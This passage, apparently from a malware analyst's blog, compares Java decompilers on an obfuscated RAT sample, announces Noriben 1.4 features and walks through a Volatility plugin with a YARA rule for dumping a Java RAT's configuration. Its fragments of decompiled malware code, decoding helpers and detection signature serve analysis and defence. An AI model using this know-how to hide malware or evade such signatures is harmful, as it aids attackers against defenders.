var10001[var10002] = var4;
var10001 = var10000;
var10002 = 2;
var10003 = "M\n2l ~*(^\'h./g \"o f x+>p M8/a(y2(v ";
var10004 = 1;
break;
case 1:
var10001[var10002] = var4;
var10001 = var10000;
var10002 = 3;
var10003 = "T \t8T";
var10004 = 2;
break;
case 2:
var10001[var10002] = var4;
var10001 = var10000;
var10002 = 4;
var10003 = "B$(v | )k t";
var10004 = 3;
break;
case 3:
var10001[var10002] = var4;
z = var10000;
return;
default:
var10001[var10002] = var4;
var10001 = var10000;
var10002 = 1;
var10003 = "Y \bV5_ \f";
var10004 = 0;
}
}
}
}
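Although it is the opposite of what we wanted, that decompiled routine hands us everything needed to decode the strings by hand: each character is XORed with one of five values chosen by its position modulo 5. The Python sketch below applies those five case values (17, 93, 91, 2, 116) to three of the encoded strings. The strings are copied from the JAD listing earlier, since it preserves the control characters as octal escapes; `zkm_decrypt` is my own name for the helper.

```python
KEY = (17, 93, 91, 2, 116)  # the five case values from switch(var0 % 5)


def zkm_decrypt(encoded, key=KEY):
    """XOR each character with the key value selected by its index modulo 5."""
    return "".join(chr(ord(ch) ^ key[i % len(key)]) for i, ch in enumerate(encoded))


for encoded in ("Y\022\bV5_\016\f", "T\017\t8T", "B$(v\021|\031)k\002t"):
    print(repr(zkm_decrypt(encoded)))
# prints 'HOSTANSW', 'ERR: ' and 'SystemDrive'
```

These match the strings that JMD substituted into the deobfuscated class, which is a handy sanity check when a deobfuscator is unavailable or fails.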


Test 2

The second test is against a very basic class file that performs one overall function, to delete a passed filename. One notable feature about this class file is that it contains no string table. That is one less layer to work around, but it still gave some issues.

JD-GUI (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)

public class cc extends u
{
// ERROR //
public void b(java.lang.String paramString)
{
// Byte code:
// 0: getstatic 76 c:db I
// 3: istore 5
// 5: invokestatic 13 s:b ()Ljava/lang/String;
// 8: astore_2
// 9: invokestatic 13 s:b ()Ljava/lang/String;
// 12: astore_3
// 13: new 6 java/io/File
// 16: dup
// 17: new 8 java/lang/StringBuilder
... Reduced for brevity ...
// 93: athrow
// 94: aload 4
// 96: getstatic 9 s:h Ljava/io/DataInputStream;
// 99: aconst_null
// 100: invokestatic 11 g:e ()[B
// 103: invokestatic 12 p:b (Ljava/io/File;Ljava/io/DataInputStream;Lq;[B)V
// 106: return
//
// Exception table:
// from to target type
// 46 59 62 re
// 53 70 73 re
// 63 80 83 re
// 74 90 93 re
}
}

The first run of JD-GUI against this file produced identical results regardless of whether a deobfuscator was used. That leads to the assumption that the core obfuscation used by this malware is to simply rename functions and encode strings. However, it failed to decompile the code in any way, providing just basic disassembled code.

Procyon (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)

import java.io.*;

public class cc extends u
{
public void b(final String s) {
final int db = c.db;
final String b = s.b();
final String b2 = s.b();
final File file = new File(b + File.separator + b2);
File file3 = null;
Label_0096: {
Label_0094: {
try {
final File file2 = file3 = file;
if (db != 0) {
break Label_0096;
}
if (!file2.exists()) {
break Label_0094;
}
}
catch (re re) {
throw re;
}
final File file4;
try {
file4 = (file3 = file);
if (db != 0) {
break Label_0096;
}
}
catch (re re2) {
throw re2;
}
try {
if (!file4.isFile()) {
break Label_0094;
}
}
catch (re re3) {
throw re3;
}
try {
file.delete();
}
catch (re re4) {
throw re4;
}
}

file3 = file;
}

p.b(file3, s.h, null, g.e());
}
}

Procyon provides ideal output. It shows the various exception catching taking place to ensure that the file exists, and is a file (not a folder or device), before calling for the deletion of it. The only issue is that the file object is copied into three other objects (file2, file3, file4) for exception catching purposes. Realistically, these would likely all be the same object.


JAD (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)


import java.io.File;

public class cc extends u
{

public cc()
{
}

public void b(String s1)
{
File file;
int i;
i = c.db;
String s2 = s.b();
String s3 = s.b();
file = new File((new StringBuilder(String.valueOf(s2))).append(File.separator).append(s3).toString());
file;
if(i != 0) goto _L2; else goto _L1
_L1:
exists();
JVM INSTR ifeq 94;
goto _L3 _L4
throw;
_L3:
file;
if(i != 0) goto _L2; else goto _L5
throw;
_L5:
isFile();
JVM INSTR ifeq 94;
goto _L6 _L4
throw;
_L6:
file.delete();
goto _L4
throw;
_L4:
file;
_L2:
s.h;
null;
g.e();
p.b();
}
}

Here, JAD slightly disappoints. It was unable to create decompiled code from the point of the first exception catch. Instead, it reverts to a mix of disassembled Java code and decompiled code. However, the class is still simple enough to understand the functionality from this view, though it's nowhere near as useable as Procyon.


What about Krakatau?
Krakatau was mentioned earlier, but not shown here. In my experience, Krakatau provides one of the best decompilation outputs, and is able to reverse a larger array of unusual code. In fact, for the first test, it is able to produce valid code for both the obfuscated routine and the string encoder. It is definitely worthy of mention and use. However, I also had many issues with getting it to work correctly. It would crash on most samples I gave it, though it would still produce decompiled results. Most of this is due to minor issues: hardcoded checks for a file extension of ".jar", a Java path of JAVA_HOME\jre\lib\rt.jar instead of the "jre7" folder seen on my system, etc. It may require small adjustments and an analytic eye to work cleanly in its current state, but it is definitely shaping up to become one of the better decompilers.

reJ (raw class file)

I can't just bring up reJ and not discuss it more in depth. reJ is my favorite Java tool for code manipulation, giving you a great deal of power over the code in its compiled form. It is a Java-based disassembler and hex editor for compiled Java class files. It provides granular inspection of the byte codes, string tables, and hardcoded values. It also allows for the direct editing, deletion, and addition of new byte code. It is only a disassembler, though, so its use requires extra knowledge of Java bytecode.

For a better analysis, I'd recommend toggling/enabling the following:
  • View -> Reference Translation -> Hybrid
  • View -> Split Mode -> Hex View
  • View -> Constant Pool

With some practice, you can work some magic with obfuscated Java code with reJ. By inserting print statements you could have the program display all of its decoded/operational values during run time. However, this does require that you manually manage the stack pointers, which is not for the faint of reversing.


Closing Statements

The one takeaway from all of this is that there is, still, no clear-cut best decompiler. Up until this year, it was a losing battle of abandoned products against ever-changing obfuscators and Java implementations. The recent introduction of Procyon, CFP, and Krakatau has brought much-needed new blood into the field. While their results are still not perfect, the hope is that within the next year or two they will surpass JD-GUI and JAD.

For now, though, analysis still requires that a reverser run multiple decompilers against their sample to determine the actual functionality. My current flow has always been to run JD-GUI first, then JAD. However, I've been swayed towards Procyon, accompanied by its new GUIs, to easily churn through hundreds of classes and JAR files, making it my current first-run analysis tool. Krakatau is also included, but it's not yet a tool I would give to a junior analyst.

I'm very excited to see what will come about with these products next year when they've had a chance to mature.



Noriben version 1.4 released

It's been a few months since the last official release of Noriben. The interim time has been filled with a few ninja-edits of updated filters, and wondering what to put in next.

Noriben started out as a simple wrapper to Sysinternals procmon to automatically gather all of the runtime details for malware analysis within a VM. It then filters out all the unnecessary system details until what's left is a fairly concise view of what the malware did to the system while running. It is a great alternative to a dedicated sandbox environment. More details on Noriben can be found here.

Over the months I was ecstatic to hear of organizations using Noriben in various roles. Many had modified the script to use it as an automated sandbox to run alongside their commercial products, which was exactly one of my goals for the script. However, the current requirement of manual interaction was an issue and I saw many ugly hacks of how people bypassed it. The new version should take care of that issue.
This was originally a release for version 1.3, which I pushed up on Friday. However, I received quite a bit of feedback asking for other new features, so I quickly pushed up version 1.4.

In the new version 1.4, I've introduced a few new features:

  • A non-interactive mode that runs for a specified number of seconds on malware that is specified from the command line
  • The ability to generalize strings, using Windows environment variables
  • The ability to specify an output directory
Non-Interactive Mode
The non-interactive mode was needed for a long time, and I apologize that it took so long to implement, as it was a very easy addition. It can be set in one of two ways:
The beginning of the source has a new line:

timeout_seconds = 0

By setting this to a value other than zero, Noriben will automatically wait that number of seconds to monitor the file system. This can be hardcoded for automated implementations, such as in a sandbox environment.

This value can also be overridden with a command line option of --timeout (-t). When using this argument, Noriben will enable the timeout mode and use the specified number of seconds. This is useful if you have a particularly long runtime sample. Even if Noriben.py was modified to have a 120-second timeout, you can override this on the command line with a much greater value (3600 seconds, for example).

Noriben now also lets you specify the malware from the command line, making it completely non-interactive:

Noriben.py --cmd "C:\malware\bad.exe www.badhost.com 80" --timeout 300

This command line will launch bad.exe, with the given arguments, and monitor it for a period of 5 minutes. At that point Noriben will stop monitoring, but the malware itself will continue to run.

Output Directory
An alternate output directory can be specified on the command line with --output. If this folder does not exist, it will be created. If Noriben is unable to create the directory, such as when it doesn't have access (e.g. C:\Windows\System32\), then it will give an error and quit.


String Generalization
One requested feature was to replace the file system paths with the Windows environment variables, to make them generic. Many people copy and paste their Noriben results which may show system-specific values, such as "C:\Documents and Settings\Bob\malware.exe". This string will be generalized to "%UserProfile%\malware.exe".

This feature is turned off by default, but can be enabled by changing the following setting in the file to True:

generalize_paths = False

Or by setting --generalize on the command line.
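
To make the idea concrete, here is a minimal sketch of path generalization in Python 3. It is not Noriben's actual code: the function name generalize_path and the SAMPLE_ENV values are made up for illustration, and it only rewrites a matching prefix of the path.

```python
def generalize_path(path, env_vars):
    """Replace a leading directory with the %Name% of a matching variable."""
    # Try the longest values first so a user profile wins over the bare drive
    ordered = sorted(env_vars.items(), key=lambda kv: len(kv[1]), reverse=True)
    for name, value in ordered:
        if not value or not path.lower().startswith(value.lower()):
            continue
        rest = path[len(value):]
        # Only accept a match that ends on a path boundary
        if rest == '' or rest.startswith('\\'):
            return '%' + name + '%' + rest
    return path


# Hypothetical values; on a live system they could be read from os.environ
SAMPLE_ENV = {
    'UserProfile': r'C:\Documents and Settings\Bob',
    'SystemRoot': r'C:\WINDOWS',
    'SystemDrive': 'C:',
}

print(generalize_path(r'C:\Documents and Settings\Bob\malware.exe', SAMPLE_ENV))
# prints %UserProfile%\malware.exe
```

Sorting by length matters: without it, the short SystemDrive value would match first and every path would collapse to %SystemDrive%.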


All in all, these features could be summed up with:

Noriben.py --output C:\Logs\Malware --timeout 300 --generalize --cmd "C:\Malware\evil.exe"
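
For anyone wiring something similar into their own automation, the way the hardcoded defaults and the command line options interact can be sketched as below. This is an illustration in Python 3 using argparse, not a copy of Noriben's source; only the option names and the two variables timeout_seconds and generalize_paths come from the description above, and parse_args is a name I made up.

```python
import argparse

timeout_seconds = 0        # hardcoded default; 0 keeps the interactive behavior
generalize_paths = False   # hardcoded default for path generalization


def parse_args(argv):
    """Parse the options and fold in the hardcoded defaults."""
    parser = argparse.ArgumentParser(description='Sketch of the 1.4 options')
    parser.add_argument('--cmd', help='command line of the sample to launch')
    parser.add_argument('-t', '--timeout', type=int, help='seconds to monitor')
    parser.add_argument('--output', help='directory for the results')
    parser.add_argument('--generalize', action='store_true',
                        help='replace paths with environment variables')
    args = parser.parse_args(argv)
    # A timeout given on the command line overrides the one in the source
    if args.timeout is None:
        args.timeout = timeout_seconds
    # Either the flag or the hardcoded setting turns generalization on
    args.generalize = args.generalize or generalize_paths
    return args


args = parse_args(['--output', r'C:\Logs\Malware', '--timeout', '300',
                   '--generalize', '--cmd', r'C:\Malware\evil.exe'])
print(args.timeout, args.generalize, args.output)
```

With no arguments at all, the sketch falls back to the values set at the top of the file, which is the behavior you would want for a fixed sandbox configuration.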

Download Noriben

Dumping Malware Configuration Data from Memory with Volatility



When I first started delving into memory forensics, years ago, we relied upon controlled operating system crashes (to create memory crash dumps) or the old FireWire exploit with a special laptop. Later, software-based tools like regular dd, and win32dd, made the job much easier (and more entertaining as we watched the feuds between mdd and win32dd).

In the early days, our analysis was basically performed with a hex editor. By collecting volatile data from an infected system, we'd attempt to map memory locations manually to known processes, an extremely frustrating and error-prone procedure. Even with the advent of graphical tools such as HBGary Responder Pro, which comes with a hefty price tag, I've found most of my time spent viewing raw memory dumps in WinHex.

The industry has slowly changed as tools like Volatility have gained maturity and become more feature-rich. Volatility is a free and open-source memory analysis tool that takes the hard work out of mapping and correlating raw data to actual processes. At first I shunned Volatility for its sheer amount of command line memorization, where each query required memorizing a specialized command line. Over the years, I've come to appreciate this aspect and the flexibility it provides to an examiner.

It's with Volatility that I focus the content for this blog post, to dump malware configurations from memory.

For those unfamiliar with the concept, it's rare to find static malware. That is, malware that has a plain-text URL in its .rdata section mixed in with other strings. Modern malware tends to be more dynamic, allowing for configurations to be downloaded upon infection, or be strategically injected into the executable by its author. Crimeware malware (Carberp, Zeus) tend to favor the former, connecting to a hardcoded IP address or domain to download a detailed configuration profile (often in XML) that is used to determine how the malware is to operate. What domains does it beacon to, on which ports, and with what campaign IDs - these are the items we determine from malware configurations.

Other malware rely upon a known block of configuration data within the executable, sometimes found within .rdata or simply in the overlay (the data after the end of the actual executable). Sometimes this data is in plain text, often it's encoded or encrypted. A notable example of this is in Mandiant's APT1 report on TARSIP-MOON, where a block of encrypted data is stored in the overlay. The point of this implementation is that an author can compile their malware, and then add in the appropriate configuration data after the fact.

As a method of improving the timeliness of malware analysis, I've been advocating for greater research and implementation of configuration dumpers. By identifying where data is stored within the file, and by knowing its encryption routine, one could simply write a script to extract the data, decrypt it, and print it out. Without even running the malware we know its intended C2 communications and have immediate signatures that we can then implement into our network defenses.

While this data may appear as a simple structure in plaintext in a sample, often it's encoded or encrypted via a myriad of techniques. Often this may be a form of encryption that we, or our team, deemed too difficult to decrypt in a reasonable time. This is pretty common: advanced encryption or compression can take weeks to completely unravel and is often left for when there's downtime in operations.

What do we do, then? Easy, go for the memory.

We know that the malware has a decryption routine that takes in this data and produces decrypted output. By simply running the malware and analyzing its memory footprint, we will often find the decrypted results in plaintext, as the data has already been decrypted and is in use by the malware.

Why break the encryption when we can let the malware just decrypt it for us?



For example, the awesome people at Malware.lu released a static configuration dumper for a known Java-based RAT. This dumper, available here on their GitHub repo, extracts the encryption key and configuration data from the malware's Java ZIP and decrypts it. It uses Triple DES (TDEA), but once that routine became public knowledge, the author quickly switched to a new routine. The author has since continued switching encryption routines regularly to avoid easy decryption. Based on earlier analysis, we know that the data is decrypted as:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   70 6F 72 74 3D 33 31 33  33 37 53 50 4C 49 54 01   port=31337SPLIT.
00000016   6F 73 3D 77 69 6E 20 6D  61 63 53 50 4C 49 54 01   os=win macSPLIT.
00000032   6D 70 6F 72 74 3D 2D 31  53 50 4C 49 54 03 03 03   mport=-1SPLIT...
00000048   70 65 72 6D 73 3D 2D 31  53 50 4C 49 54 03 03 03   perms=-1SPLIT...
00000064   65 72 72 6F 72 3D 74 72  75 65 53 50 4C 49 54 01   error=trueSPLIT.
00000080   72 65 63 6F 6E 73 65 63  3D 31 30 53 50 4C 49 54   reconsec=10SPLIT
00000096   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000112   74 69 3D 66 61 6C 73 65  53 50 4C 49 54 03 03 03   ti=falseSPLIT...
00000128   69 70 3D 77 77 77 2E 6D  61 6C 77 61 72 65 2E 63   ip=www.malware.c
00000144   6F 6D 53 50 4C 49 54 09  09 09 09 09 09 09 09 09   omSPLIT.........
00000160   70 61 73 73 3D 70 61 73  73 77 6F 72 64 53 50 4C   pass=passwordSPL
00000176   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000192   69 64 3D 43 41 4D 50 41  49 47 4E 53 50 4C 49 54   id=CAMPAIGNSPLIT
00000208   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000224   6D 75 74 65 78 3D 66 61  6C 73 65 53 50 4C 49 54   mutex=falseSPLIT
00000240   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000256   74 6F 6D 73 3D 2D 31 53  50 4C 49 54 04 04 04 04   toms=-1SPLIT....
00000272   70 65 72 3D 66 61 6C 73  65 53 50 4C 49 54 02 02   per=falseSPLIT..
00000288   6E 61 6D 65 3D 53 50 4C  49 54 06 06 06 06 06 06   name=SPLIT......
00000304   74 69 6D 65 6F 75 74 3D  66 61 6C 73 65 53 50 4C   timeout=falseSPL
00000320   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000336   64 65 62 75 67 6D 73 67  3D 74 72 75 65 53 50 4C   debugmsg=trueSPL
00000352   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............

Or, even if we couldn't decrypt this, we know that it's beaconing to a very unique domain name and port which can be searched upon. Either way, we now have a sample where we can't easily get to this decrypted information. So, let's solve that.

By running the malware within a VM, we should have a logical file for the memory space. In VMware, this is a .VMEM file (or .VMSS for snapshot memory). In VirtualBox, it's a .SAV file. After running our malware, we suspend the guest operating system and then focus our attention on the memory file.

The best way to start is to simply grep the file (from the command line or a hex editor) for the unique C2 domains or artifacts. This should get us into the general vicinity of the configuration and show us the structure of it:

E:\VMs\WinXP_Malware>grep "www.malware.com" *
Binary file WinXP_Malware.vmem matches

With this known, we open the VMEM file and see a configuration that matches what we've previously seen. This tells us that the encryption routine changed but the configuration format did not, which is common. This is where we bring out Volatility.
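
If grep isn't handy, the same spot check can be done with a few lines of Python 3. This is a rough sketch, with find_in_memory_file being a name I made up; it memory-maps the file so a multi-gigabyte image isn't read in all at once, and returns each hit's offset along with a little surrounding data.

```python
import mmap


def find_in_memory_file(path, needle, context=16):
    """Return (offset, nearby bytes) for every occurrence of needle."""
    hits = []
    with open(path, 'rb') as handle:
        mem = mmap.mmap(handle.fileno(), 0, access=mmap.ACCESS_READ)
        try:
            offset = mem.find(needle)
            while offset != -1:
                start = max(0, offset - context)
                end = offset + len(needle) + context
                hits.append((offset, mem[start:end]))
                # Resume one byte further on so overlapping hits are kept
                offset = mem.find(needle, offset + 1)
        finally:
            mem.close()
    return hits
```

Calling find_in_memory_file('WinXP_Malware.vmem', b'www.malware.com') would give a list of file offsets to jump to in a hex editor. Note that these are offsets into the raw file, not virtual addresses within a process.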

Searching Memory with Volatility


We know that the configuration data begins with the text of "port=<number>SPLIT", where "SPLIT" is used to delimit each field. This can then be used to create a YARA rule of:

rule javarat_conf {
    strings: $a = /port=[0-9]{1,5}SPLIT/ 
    condition: $a
}

This YARA rule uses the regular expression structure (defined with forward slashes around the text) to search for "port=" followed by a number that is 1 - 5 characters long. This rule will be used to get us to the beginning of the configuration data. If there is no good way to get to the beginning, but only later in the data, that's fine. Just note that offset variance between where the data should start and where the YARA rule puts us.
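
The regular expression and the offset variance can be tried out on a small buffer before touching a memory image. The sketch below uses Python 3's re module rather than YARA itself, and locate_config and the sample bytes are made up for illustration.

```python
import re


def locate_config(buffer, pattern, offset_adjust=0):
    """Return where the configuration starts, or None if nothing matched."""
    match = re.search(pattern, buffer)
    if match is None:
        return None
    # offset_adjust is negative when the pattern hits past the true start
    return match.start() + offset_adjust


# Six bytes of unrelated data, then the first two configuration fields
sample = b'\x00\x00junk' + b'port=31337SPLIT\x01os=win macSPLIT\x01'

print(locate_config(sample, rb'port=[0-9]{1,5}SPLIT'))   # prints 6
print(locate_config(sample, rb'os=win', -16))            # prints 6
```

The second call shows the variance at work: a signature on "os=win" lands 16 bytes into the data, so an adjustment of -16 brings us back to the same starting point.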

Let's test this rule with Volatility first, to ensure that it works:

E:\Development\volatility>vol.py -f E:\VMs\WinXP_Malware\WinXP_Malware.vmem yarascan -Y "/port=[0-9]{1,5}SPLIT/"
Volatile Systems Volatility Framework 2.3_beta
Rule: r1
Owner: Process VMwareUser.exe Pid 1668
0x017b239b  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 2e   port=31337SPLIT.
0x017b23ab  0a 30 30 30 30 30 30 31 36 20 20 20 36 46 20 37   .00000016...6F.7
0x017b23bb  33 20 33 44 20 37 37 20 36 39 20 36 45 20 32 30   3.3D.77.69.6E.20
0x017b23cb  20 36 44 20 20 36 31 20 36 33 20 35 33 20 35 30   .6D..61.63.53.50
Rule: r1
Owner: Process javaw.exe Pid 572
0x2ab9a7f4  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 01   port=31337SPLIT.
0x2ab9a804  6f 73 3d 77 69 6e 20 6d 61 63 53 50 4c 49 54 01   os=win.macSPLIT.
0x2ab9a814  6d 70 6f 72 74 3d 2d 31 53 50 4c 49 54 03 03 03   mport=-1SPLIT...
0x2ab9a824  70 65 72 6d 73 3d 2d 31 53 50 4c 49 54 03 03 03   perms=-1SPLIT...

One interesting side effect to working within a VM is that some data may appear under the space of VMWareUser.exe. The data is showing up somewhere outside of the context of our configuration. We could try to change our rule, but the simpler solution within the plugin is to just rule out hits from VMWareUser.exe and only allow hits from executables that contain "java".

Now that we have a rule, how do we automate this? By writing a quick and dirty plugin for Volatility.

Creating a Plugin


A quick plugin that I'm demonstrating is composed of two primary components: a YARA rule, and a configuration dumper. The configuration dumper scans memory for the YARA rule, reads memory, and displays the parsed results. An entire post could be written on just this file format, so instead I'll post a very generic plugin and highlight what should be modified. I wrote this based on the two existing malware dumpers already released with Volatility: Zeus and Poison Ivy.

Jamie Levy and Michael Ligh, both core developers on Volatility, provided some critical input on ways to improve and clean up the code.


# JavaRAT detection and analysis for Volatility - v 1.0
# This version is limited to JavaRAT's clients 3.0 and 3.1, and maybe others
# Author: Brian Baskin <brian@thebaskins.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA

import volatility.plugins.taskmods as taskmods
import volatility.win32.tasks as tasks
import volatility.utils as utils
import volatility.debug as debug
import volatility.plugins.malware.malfind as malfind
import volatility.conf as conf
import string

try:
    import yara
    has_yara = True
except ImportError:
    has_yara = False


signatures = {
    'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}


config = conf.ConfObject()
config.add_option('CONFSIZE', short_option='C', default=256,
                  help='Config data size',
                  action='store', type='int')
config.add_option('YARAOFFSET', short_option='Y', default=0,
                  help='YARA start offset',
                  action='store', type='int')

class JavaRATScan(taskmods.PSList):
    """ Extract JavaRAT Configuration from Java processes """

    def get_vad_base(self, task, address):
        for vad in task.VadRoot.traverse():
            if address >= vad.Start and address < vad.End:
                return vad.Start
        return None

    def calculate(self):
        """ Required: Runs YARA search to find hits """
        if not has_yara:
            debug.error('Yara must be installed for this plugin')

        addr_space = utils.load_as(self._config)
        rules = yara.compile(sources=signatures)
        for task in self.filter_tasks(tasks.pslist(addr_space)):
            if 'vmwareuser.exe' == task.ImageFileName.lower():
                continue
            if not 'java' in task.ImageFileName.lower():
                continue
            scanner = malfind.VadYaraScanner(task=task, rules=rules)
            for hit, address in scanner.scan():
                vad_base_addr = self.get_vad_base(task, address)
                yield task, address

    def make_printable(self, input):
        """ Optional: Remove non-printable chars from a string """
        input = input.replace('\x09', '')  # string.printable includes tabs, so strip them first
        return ''.join(filter(lambda x: x in string.printable, input))

    def parse_structure(self, data):
        """ Optional: Parses the data into a list of values """
        struct = []
        items = data.split('SPLIT')
        for i in range(len(items) - 1):  # Iterate this way to ignore any slack data behind last 'SPLIT'
            item = self.make_printable(items[i])
            field, value = item.split('=', 1)  # Split once so a value may contain '='
            struct.append('%s: %s' % (field, value))
        return struct


    def render_text(self, outfd, data):
        """ Required: Parse data and display """
        delim = '-=' * 39 + '-'
        rules = yara.compile(sources=signatures)
        outfd.write('YARA rule: {0}\n'.format(signatures))
        outfd.write('YARA offset: {0}\n'.format(self._config.YARAOFFSET))
        outfd.write('Configuration size: {0}\n'.format(self._config.CONFSIZE))
        for task, address in data:  # iterate the yield values from calculate()
            outfd.write('{0}\n'.format(delim))
            outfd.write('Process: {0} ({1})\n\n'.format(task.ImageFileName, task.UniqueProcessId))
            proc_addr_space = task.get_process_address_space()
            conf_data = proc_addr_space.read(address + self._config.YARAOFFSET, self._config.CONFSIZE)
            config = self.parse_structure(conf_data)
            for i in config:
                outfd.write('\t{0}\n'.format(i))

This code is also available on my GitHub.

In a nutshell, you first have a signature to key on for the configuration data. This is a fully qualified YARA signature, seen as:

signatures = {
    'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}

This rule is stored in a Python dictionary format of 'rule_name' : 'rule contents'.

The plugin allows a command line argument (-Y) to set the YARA offset. If your YARA signature hits 80 bytes past the beginning of the structure, then set this value to -80, and vice versa. This can also be hardcoded by changing the default value.

There is a second command line argument (-C) to set the size of data to read for parsing. This can also be hardcoded. This will vary based upon the malware; I've seen some configurations that are multiple kilobytes in size.

Rename the class, seen here as JavaRATScan, to whatever fits for your malware. It has to be a unique name. Additionally, the """ """ docstring below the class name contains the description which will be displayed on the command line.

I do have an optional rule to limit the search to a certain subset of processes. In this case, only processes that contain the word "java" - this is a Java-based RAT, after all. It also skips any process of "VMWareUser.exe".

The plugin contains a parse_structure routine that is fed a block of data. It then parses it into a list of items that are returned and printed to the screen (or file, or whatever output is desired). This will ultimately be unique to each malware. The optional function make_printable() is one I made to clean the non-printable characters out of the output, and it can be extended to block additional characters.
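
The parsing logic can be exercised outside of Volatility, which is handy when adapting it to a new family. Below is a standalone sketch in Python 3 (the plugin itself targets the Python 2 that Volatility runs on). The name parse_config, the dictionary return type, and the stricter printable-ASCII whitelist are my own choices for illustration, and the sample bytes are a shortened version of the decrypted data shown earlier.

```python
SAFE = set(range(0x20, 0x7f))  # printable ASCII only, no control characters


def parse_config(data, delimiter=b'SPLIT'):
    """Turn 'key=valueSPLIT' records, with padding in between, into a dict."""
    fields = {}
    # Whatever trails the last delimiter is slack, not a field
    for chunk in data.split(delimiter)[:-1]:
        text = bytes(b for b in chunk if b in SAFE).decode('ascii')
        if '=' not in text:
            continue  # skip anything that is not a key=value pair
        key, value = text.split('=', 1)
        fields[key] = value
    return fields


sample = (b'port=31337SPLIT\x01os=win macSPLIT\x01mport=-1SPLIT\x03\x03\x03'
          b'ip=www.malware.comSPLIT' + b'\x09' * 9 +
          b'pass=passwordSPLIT' + b'\x0e' * 14 + b'name=SPLIT\x06\x06')

for key, value in parse_config(sample).items():
    print('{0}: {1}'.format(key, value))
```

Whitelisting the range 0x20 to 0x7E drops every padding byte value up to 0x10, including tabs and newlines, without having to name each one.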

Running the Plugin


As a rule, I place all of my Volatility plugins into their own unique directory. I then reference this upon runtime, so that my files are cleanly segregated. This is performed via the --plugins option in Volatility:

E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins

After specifying a valid plugins folder, run vol.py with the -h option to ensure that your new scanner appears in the listing:

E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins -h
Volatile Systems Volatility Framework 2.3_beta
Usage: Volatility - A memory forensics analysis platform.

Options:
...

        Supported Plugin Commands:

                apihooks        Detect API hooks in process and kernel memory
...
                javaratscan  Extract JavaRAT Configuration from Java processes
...

The names are automatically populated based upon your class names. The text description is automatically pulled from the "docstring", which is the comment that directly follows the class name in the plugin. 

With these in place, run your scanner and cross your fingers:


For future use, I'd recommend prepending your plugin name with a unique identifier to make it stand out, like "SOC_JavaRATScan". Prepending with a "zz_" would make the new plugins appear at the bottom of Volatility's help screen. Regardless, it'll help group the built-in plugins apart from your custom ones.

The Next Challenge: Data Structures


The greater challenge is when data is read from within the executable into a data structure in memory. While the data may have a concise and structured form when stored in the file, it may be transformed into a more complex and unwieldy format once read into memory by the malware. Some samples may decrypt the data in-place, then load it into a structure. Others decrypt it on-the-fly so that it is only visible after loading into a structure.

For example, take the following fictitious C2 data stored in the overlay of an executable:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 A2 A0 AC B1 A0 A8 A6  AF 17 89 95 95 91 DB CE   .¢ ¬± ¨¦¯.‰••‘ÛÎ
00000016   CE 96 96 96 CF 84 97 88  8D 92 88 95 84 CF 82 8E   Ζ––Ï„—ˆ’ˆ•„Ï‚Ž
00000032   8C 03 D5 D5 D2 08 B1 A0  B2 B2 B6 AE B3 A5 05 84   Œ.ÕÕÒ.± ²²¶®³¥.„
00000048   99 95 93 80                                        ™•“€

By reversing the malware, we determine that this is composed of Pascal strings XOR-encoded with 0xE1. Pascal strings are length-prefixed, so applying the correct decoding would result in:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 43 41 4D 50 41 49 47  4E 17 68 74 74 70 3A 2F   .CAMPAIGN.http:/
00000016   2F 77 77 77 2E 65 76 69  6C 73 69 74 65 2E 63 6F   /www.evilsite.co
00000032   6D 03 34 34 33 08 50 41  53 53 57 4F 52 44 05 65   m.443.PASSWORD.e
00000048   78 74 72 61                                        xtra

This is a very simple encoding routine, which I made with just:

items = ['CAMPAIGN', 'http://www.evilsite.com', '443', 'PASSWORD', 'extra']
data = ''
for i in items:
    data += chr(len(i))
    for x in i: data += chr(ord(x) ^ 0xE1)
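
Going the other direction is just as short. The sketch below, in Python 3, walks the length prefixes and reverses the XOR; decode_pascal_xor is a name I made up, and the bytes are the fictitious overlay data shown above.

```python
def decode_pascal_xor(blob, key=0xE1):
    """Decode length-prefixed strings whose characters are XORed with key."""
    items = []
    pos = 0
    while pos < len(blob):
        length = blob[pos]  # the length prefix itself is not encoded
        raw = blob[pos + 1:pos + 1 + length]
        items.append(bytes(b ^ key for b in raw).decode('ascii'))
        pos += 1 + length
    return items


encoded = bytes.fromhex(
    '08 A2 A0 AC B1 A0 A8 A6 AF 17 89 95 95 91 DB CE '
    'CE 96 96 96 CF 84 97 88 8D 92 88 95 84 CF 82 8E '
    '8C 03 D5 D5 D2 08 B1 A0 B2 B2 B6 AE B3 A5 05 84 '
    '99 95 93 80'
)

print(decode_pascal_xor(encoded))
# prints ['CAMPAIGN', 'http://www.evilsite.com', '443', 'PASSWORD', 'extra']
```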


Data structures are a subtle and difficult component of reverse engineering, and vary in complexity with the skill of the malware author. Unfortunately, data structures are some of the least shared indicators in the industry.

Once completed, a sample structure could appear similar to the following:

struct Configuration
{
